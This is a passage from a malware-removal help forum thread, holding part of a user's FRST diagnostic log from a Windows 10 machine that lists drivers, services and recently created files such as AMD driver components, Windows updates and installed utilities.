R1 SymIRON; C:\Windows\system32\drivers\NISx64\1605020.00F\Ironx64.SYS [297720 2015-07-10] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NISx64\1605020.00F\SYMNETS.SYS [576248 2015-07-10] (Symantec Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
kfoxsr is offline  
Old 09-18-2015, 04:47 AM   #5
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-09-17 14:13 - 2015-09-17 14:14 - 00054258 _____ C:\Users\Ken Terry\Downloads\FRST.txt
2015-09-17 14:13 - 2015-09-17 14:13 - 00000000 ____D C:\FRST
2015-09-17 14:12 - 2015-09-17 14:12 - 02191360 _____ (Farbar) C:\Users\Ken Terry\Downloads\FRST64.exe
2015-09-17 13:44 - 2015-09-17 13:44 - 00016148 _____ C:\WINDOWS\system32\KENTERRY-HP_Ken Terry_HistoryPrediction.bin
2015-09-14 12:05 - 2015-09-14 12:05 - 00001966 _____ C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\WeatherBug®.lnk
2015-09-14 12:05 - 2015-09-14 12:05 - 00001942 _____ C:\Users\Ken Terry\Desktop\WeatherBug®.lnk
2015-09-14 12:04 - 2015-09-14 12:05 - 03390776 _____ (Earth Networks, Inc. ) C:\Users\Ken Terry\Downloads\WeatherBugSetup.exe
2015-09-13 10:57 - 2015-09-13 10:57 - 00001234 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-09-13 10:57 - 2015-09-13 10:57 - 00001222 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-09-13 10:57 - 2015-09-13 10:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-09-13 10:54 - 2015-09-13 10:55 - 00242752 _____ C:\Users\Ken Terry\Downloads\Firefox Setup Stub 40.0.3.exe
2015-09-13 09:15 - 2015-09-13 09:15 - 00000040 _____ C:\WINDOWS\system32\擰ơ
2015-09-12 12:50 - 2015-09-12 12:50 - 00003638 _____ C:\WINDOWS\System32\Tasks\ReasonSecurityScheduledScan
2015-09-12 12:50 - 2015-09-12 12:50 - 00003500 _____ C:\WINDOWS\System32\Tasks\ReasonSecurityStart
2015-09-12 12:50 - 2015-09-12 12:50 - 00000000 ____D C:\ProgramData\Reason
2015-09-12 12:49 - 2015-09-12 12:49 - 00000958 _____ C:\Users\Public\Desktop\Reason Core Security.lnk
2015-09-12 12:49 - 2015-09-12 12:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reason Core Security
2015-09-12 12:49 - 2015-09-12 12:49 - 00000000 ____D C:\Program Files\Reason
2015-09-12 12:48 - 2015-09-12 12:49 - 04257344 _____ (Reason Software Company Inc.) C:\Users\Ken Terry\Downloads\reason-core-security-setup.exe
2015-09-06 07:23 - 2015-09-06 07:32 - 00000000 ____D C:\ProgramData\BSD
2015-09-06 07:22 - 2015-09-06 07:22 - 00001284 _____ C:\Users\Ken Terry\Desktop\TweakBit Driver Updater.lnk
2015-09-06 07:21 - 2015-09-06 07:22 - 00000000 ____D C:\WINDOWS\System32\Tasks\TweakBit
2015-09-06 07:21 - 2015-09-06 07:22 - 00000000 ____D C:\ProgramData\TweakBit
2015-09-06 07:21 - 2015-09-06 07:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TweakBit
2015-09-06 07:21 - 2015-09-06 07:22 - 00000000 ____D C:\Program Files (x86)\TweakBit
2015-09-06 07:21 - 2015-09-06 07:21 - 00001344 _____ C:\Users\Ken Terry\Desktop\TweakBit Speedtest Optimizer.lnk
2015-09-06 07:20 - 2015-09-06 07:20 - 00213136 _____ (TweakBit) C:\Users\Ken Terry\Downloads\speedtest-optimizer-setup.exe
2015-09-04 04:45 - 2015-09-04 04:45 - 00000000 ____D C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2015-08-31 19:26 - 2015-09-13 10:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-08-31 13:08 - 2015-08-31 13:08 - 00011602 _____ C:\Users\Ken Terry\Downloads\USAO Pilot Car Sales Report.xlsx
2015-08-31 13:08 - 2015-08-31 13:08 - 00011602 _____ C:\Users\Ken Terry\Downloads\USAO Pilot Car Sales Report (1).xlsx
2015-08-31 13:07 - 2015-08-31 13:07 - 00012815 _____ C:\Users\Ken Terry\Downloads\USAO Daily Test Report.xlsx
2015-08-31 13:06 - 2015-08-31 13:06 - 00011264 _____ C:\Users\Ken Terry\Downloads\USAO Daily Revenue Report.xlsx
2015-08-29 05:53 - 2015-08-18 23:50 - 00609592 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-08-26 07:40 - 2015-08-26 07:42 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Comms
2015-08-24 10:19 - 2015-08-24 10:19 - 00632659 _____ C:\Users\Ken Terry\Downloads\download.htma;ways need my daughter.htm
2015-08-21 15:33 - 2015-08-21 15:56 - 00018803 _____ C:\Users\Ken Terry\Downloads\Customer Information.xlsx
2015-08-21 14:28 - 2015-08-21 14:28 - 00000000 ____D C:\ProgramData\ATI
2015-08-21 13:11 - 2015-08-21 13:11 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2015-08-21 07:40 - 2015-08-21 07:40 - 00061917 _____ C:\WINDOWS\SysWOW64\CCCInstall_201508210740093358.log
2015-08-21 07:40 - 2015-08-21 07:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-08-21 07:39 - 2015-08-21 07:39 - 00000000 ____D C:\Program Files\ATI Technologies
2015-08-21 07:38 - 2015-08-21 07:38 - 00066655 _____ C:\WINDOWS\SysWOW64\CCCInstall_201508210738068661.log
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-08-21 07:37 - 2015-08-21 07:37 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-08-21 07:35 - 2015-08-21 07:35 - 47795680 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 30760944 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 27544560 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 25308656 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 15727072 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 14312416 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 09191312 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 07575664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 06486000 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 05076976 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2015-08-21 07:35 - 2015-08-21 07:35 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2015-08-21 07:35 - 2015-08-21 07:35 - 01196032 _____ C:\WINDOWS\system32\amdocl_as64.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 01070592 _____ C:\WINDOWS\system32\amdocl_ld64.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 01005552 _____ C:\WINDOWS\SysWOW64\amdocl_as32.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00936928 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00807424 _____ C:\WINDOWS\SysWOW64\amdocl_ld32.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00660928 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2015-08-21 07:35 - 2015-08-21 07:35 - 00660928 _____ C:\WINDOWS\system32\atiapfxx.blb
2015-08-21 07:35 - 2015-08-21 07:35 - 00472832 _____ C:\WINDOWS\system32\amdmiracast.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00377312 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00341488 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ATIODE.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00243696 _____ C:\WINDOWS\system32\clinfo.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00213488 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00201184 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00198640 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00170464 _____ C:\WINDOWS\system32\atieah64.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00165360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00153456 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00152560 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00143344 _____ C:\WINDOWS\system32\amdhdl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00138384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00136176 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00132080 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00122352 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00117600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00111600 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00111088 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00102384 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00099296 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00095216 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00091104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00089520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00088000 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00085472 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00082680 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00081160 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00078320 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atiglpxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00078320 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atiglpxx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00073712 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00071152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00069600 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00064496 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00062432 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00061408 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ATIODCLI.exe
2015-08-21 07:35 - 2015-08-21 07:35 - 00059376 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00059360 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00052208 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Drivers\ati2erec.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00049632 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00039904 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00012784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\detoured.dll
2015-08-21 07:35 - 2015-08-21 07:35 - 00012784 _____ (Microsoft Corporation) C:\WINDOWS\system32\detoured.dll
2015-08-21 00:26 - 2015-08-21 00:26 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\NetworkTiles
2015-08-20 12:38 - 2015-08-20 12:38 - 00001241 _____ C:\Users\Public\Desktop\Intel(R) Driver Update Utility 2.2.lnk
2015-08-20 12:38 - 2015-08-20 12:38 - 00000000 ____D C:\Users\Ken Terry\AppData\Local\Intel
2015-08-20 12:38 - 2015-08-20 12:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel Driver Update Utility
2015-08-20 12:37 - 2015-08-20 12:37 - 00000000 ____D C:\ProgramData\Intel
2015-08-20 12:37 - 2015-08-20 12:37 - 00000000 ____D C:\Program Files\Intel
2015-08-20 12:37 - 2015-08-20 12:37 - 00000000 ____D C:\Program Files (x86)\Intel Driver Update Utility
2015-08-20 12:37 - 2015-06-04 03:33 - 00021984 _____ C:\WINDOWS\system32\Drivers\semav6msr64.sys
2015-08-20 12:34 - 2015-08-20 12:36 - 05069632 _____ (Intel) C:\Users\Ken Terry\Downloads\Intel Driver Update Utility Installer.exe
2015-08-19 00:05 - 2015-08-12 23:33 - 24593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-08-19 00:05 - 2015-08-12 23:23 - 02178560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2015-08-19 00:05 - 2015-08-12 23:22 - 02093056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2015-08-19 00:05 - 2015-08-12 23:17 - 01795072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2015-08-19 00:05 - 2015-08-12 23:07 - 19323392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-08-19 00:05 - 2015-08-11 05:04 - 04532304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-08-19 00:05 - 2015-08-11 05:04 - 02462648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2015-08-19 00:05 - 2015-08-11 05:03 - 08021840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-08-19 00:05 - 2015-08-11 05:02 - 00554744 _____ (Microsoft Corporation) C:\WINDOWS\system32\directmanipulation.dll
2015-08-19 00:05 - 2015-08-11 05:02 - 00292856 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2015-08-19 00:05 - 2015-08-11 04:57 - 03622256 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-08-19 00:05 - 2015-08-11 04:50 - 01643872 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-08-19 00:05 - 2015-08-11 04:40 - 04048808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-08-19 00:05 - 2015-08-11 04:40 - 02151208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2015-08-19 00:05 - 2015-08-11 04:40 - 00918320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2015-08-19 00:05 - 2015-08-11 04:38 - 00454000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directmanipulation.dll
2015-08-19 00:05 - 2015-08-11 04:37 - 00243800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2015-08-19 00:05 - 2015-08-11 04:31 - 02880032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-08-19 00:05 - 2015-08-11 04:23 - 16706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2015-08-19 00:05 - 2015-08-11 04:22 - 21875200 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2015-08-19 00:05 - 2015-08-11 04:20 - 02224640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2015-08-19 00:05 - 2015-08-11 04:16 - 02416640 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2015-08-19 00:05 - 2015-08-11 04:14 - 00404480 _____ C:\WINDOWS\system32\diagtrack_wininternal.dll
2015-08-19 00:05 - 2015-08-11 04:13 - 00413184 _____ C:\WINDOWS\system32\diagtrack_win.dll
2015-08-19 00:05 - 2015-08-11 04:11 - 02446336 _____ C:\WINDOWS\system32\InputService.dll
2015-08-19 00:05 - 2015-08-11 04:10 - 00778752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2015-08-19 00:05 - 2015-08-11 04:08 - 00893440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2015-08-19 00:05 - 2015-08-11 04:07 - 01178112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2015-08-19 00:05 - 2015-08-11 04:06 - 07523328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2015-08-19 00:05 - 2015-08-11 04:06 - 02662400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2015-08-19 00:05 - 2015-08-11 04:05 - 03527168 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-08-19 00:05 - 2015-08-11 04:05 - 00996352 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2015-08-19 00:05 - 2015-08-11 04:03 - 02558976 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-08-19 00:05 - 2015-08-11 04:02 - 03588096 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2015-08-19 00:05 - 2015-08-11 04:02 - 01890304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-08-19 00:05 - 2015-08-11 04:01 - 01334784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-08-19 00:05 - 2015-08-11 03:57 - 13024768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2015-08-19 00:05 - 2015-08-11 03:51 - 01916928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2015-08-19 00:05 - 2015-08-11 03:51 - 01823232 _____ C:\WINDOWS\SysWOW64\InputService.dll
2015-08-19 00:05 - 2015-08-11 03:49 - 00586752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2015-08-19 00:05 - 2015-08-11 03:45 - 18805760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2015-08-19 00:05 - 2015-08-11 03:45 - 01820672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2015-08-19 00:05 - 2015-08-11 03:43 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-08-19 00:05 - 2015-08-11 03:42 - 05454848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2015-08-19 00:05 - 2015-08-11 03:40 - 01964544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-08-19 00:05 - 2015-08-11 03:40 - 01593856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-08-19 00:05 - 2015-08-11 03:40 - 01112064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-08-19 00:05 - 2015-08-08 02:19 - 00608936 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2015-08-19 00:05 - 2015-08-08 01:40 - 00365056 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-08-19 00:05 - 2015-08-08 01:24 - 02415104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-08-19 00:05 - 2015-08-08 01:24 - 01679360 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-08-19 00:05 - 2015-08-08 01:15 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-08-19 00:05 - 2015-08-08 01:00 - 01985024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-08-19 00:05 - 2015-08-05 22:17 - 00237392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdyboost.sys
2015-08-19 00:05 - 2015-08-05 21:22 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2015-08-19 00:05 - 2015-08-04 23:49 - 00783112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2015-08-19 00:05 - 2015-08-04 23:29 - 00644128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2015-08-19 00:05 - 2015-08-04 23:00 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActionCenter.dll
2015-08-19 00:05 - 2015-08-04 22:54 - 01274880 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2015-08-19 00:05 - 2015-08-04 22:47 - 01383424 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2015-08-19 00:05 - 2015-08-04 22:39 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActionCenter.dll
2015-08-19 00:05 - 2015-08-03 23:07 - 00102752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mountmgr.sys
2015-08-19 00:05 - 2015-08-03 23:06 - 00583128 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2015-08-19 00:05 - 2015-08-03 21:59 - 01212416 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteNaturalLanguage.dll
2015-08-19 00:05 - 2015-08-03 21:47 - 00898560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2015-08-19 00:05 - 2015-08-02 21:32 - 00306688 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2015-08-19 00:05 - 2015-08-02 21:28 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NotificationObjFactory.dll
2015-08-19 00:05 - 2015-08-02 21:19 - 00505696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2015-08-19 00:05 - 2015-08-02 21:18 - 08613200 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2015-08-19 00:05 - 2015-08-02 21:18 - 01983840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2015-08-19 00:05 - 2015-08-02 21:13 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-08-19 00:05 - 2015-08-02 21:12 - 00801632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2015-08-19 00:05 - 2015-08-02 20:56 - 06878256 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2015-08-19 00:05 - 2015-08-02 20:50 - 20857848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-08-19 00:05 - 2015-08-02 20:49 - 00700256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2015-08-19 00:05 - 2015-08-02 20:30 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_UserAccount.dll
2015-08-19 00:05 - 2015-08-02 20:24 - 00503808 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2015-08-19 00:05 - 2015-08-02 20:24 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEEventDispatcher.dll
2015-08-19 00:05 - 2015-08-02 20:23 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEDataLayerHelpers.dll
2015-08-19 00:05 - 2015-08-02 20:22 - 01601536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2015-08-19 00:05 - 2015-08-02 20:22 - 01008640 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2015-08-19 00:05 - 2015-08-02 20:18 - 12503552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-08-19 00:05 - 2015-08-02 20:18 - 03780096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2015-08-19 00:05 - 2015-08-02 20:18 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\SubscriptionMgr.dll
2015-08-19 00:05 - 2015-08-02 20:18 - 00120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkStatus.dll
2015-08-19 00:05 - 2015-08-02 20:15 - 00595456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2015-08-19 00:05 - 2015-08-02 20:15 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2015-08-19 00:05 - 2015-08-02 20:14 - 00273920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2015-08-19 00:05 - 2015-08-02 20:14 - 00247808 _____ C:\WINDOWS\system32\facecredentialprovider.dll
2015-08-19 00:05 - 2015-08-02 20:12 - 00217088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2015-08-19 00:05 - 2015-08-02 20:11 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2015-08-19 00:05 - 2015-08-02 20:10 - 01162240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2015-08-19 00:05 - 2015-08-02 20:03 - 00494592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
2015-08-19 00:05 - 2015-08-02 20:02 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2015-08-19 00:05 - 2015-08-02 20:01 - 11262464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-08-19 00:05 - 2015-08-02 19:59 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
